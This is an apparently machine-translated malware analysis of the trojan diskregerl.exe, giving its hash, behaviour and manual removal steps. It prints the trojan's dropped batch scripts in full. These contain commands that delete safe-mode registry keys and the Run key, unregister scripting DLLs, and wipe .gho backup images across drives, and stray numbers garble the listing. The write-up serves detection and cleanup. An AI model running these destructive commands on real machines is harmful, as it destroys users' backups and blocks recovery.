Diskregerl.exe (Trojan. Agent. cdt) virus manually detection and removal
Source: Internet
Author: User
File MD5: e98a4571cf72b798077d12d6c4894629
Behavior Analysis:
1. Copy an object:
C: \ windows \ system32 \ diskregerl.exe 45,056 bytes
2. No startup Item is added.
3. Release two batches:
The content is as follows:
22483
17213
25187
6133
22690
25373
Date 2004-08-17
19477
At 20:00:00
Ping 127.0.0.1-n 5
SC .exe create diskregerl BinPath = "C: \ windows \ system32 \ diskregerl.exe-kills" type = own type = interact start = auto DisplayName = diskregerl Programnot
SC .exe description diskregerl create network connection 2
Regsvr32.exe/u/s scrrun. dll
Regsvr32.exe/u/s shimgvw. dll
Regsvr32.exe/u/s itss. dll
Regsvr32.exe/u/s vbscript. dll
Regsvr32.exe/s jscript. dll
Reg.exe delete HKLM \ SYSTEM \ ControlSet001 \ Control \ SafeBoot \ Minimal \ {4D36E967-E325-11CE-BFC1-08002BE10318}/F
Reg.exe delete HKLM \ SYSTEM \ ControlSet001 \ Control \ SafeBoot \ Network \ {4D36E967-E325-11CE-BFC1-08002BE10318}/F
Reg.exe delete HKLM \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Minimal \ {4D36E967-E325-11CE-BFC1-08002BE10318}/F
Reg.exe delete HKLM \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Network \ {4D36E967-E325-11CE-BFC1-08002BE10318}/F
Reg.exe delete HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run/F
23413
SC .exe start diskregerl
Del "C: \ WINDOWS \ Media \ Windows XP start .wav"
Del "C: \ WINDOWS \ Media \ Windows XP Information bar .wav"
Del "C: \ WINDOWS \ Media \ Windows XP pop-up window blocked. wav"
Regsvr32.exe/s C: \ windows \ system32 \ Programnot. dll
Ping 127.0.0.1-n 6
Del "C: \ Documents ents and Settings \ lonely and more reliable \ Desktop \ oky.exe"/F
22483
17213
Date 2008-04-02
At 08:21:33
Del % 0
Exit
Second:
25187
6133
226902537319477
2819720092
404
Ping 127.0.0.1-n 16
13539
Cmd.exe/c del/f/s/q c: *. gho
6752
Cmd.exe/c del/f/s/q d: *. gho
31772
Cmd.exe/c del/f/s/q e: *. gho
12028
Cmd.exe/c del/f/s/q f: *. gho
8720
Cmd.exe/c del/f/s/q g: *. gho
10731
Cmd.exe/c del/f/s/q h: *. gho
8840
Cmd.exe/c del/f/s/q I: *. gho
11736
Regsvr32.exe/s C: \ windows \ system32 \ Programnot. dll
Del % 0
Exit
4. Connect to the website and fl traffic:
Http://www.xerty.cn/hangzhou/300center.htm
5. In addition, the virus may maliciously lock the IE homepage, but it is not implemented.
Solution:
1. restart the computer.
2. delete an object:
C: \ windows \ system32 \ diskregerl.exe
3. If the virus cannot be deleted after restart, download the ice blade (this software can be downloaded at down.45it.com) and end the process.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.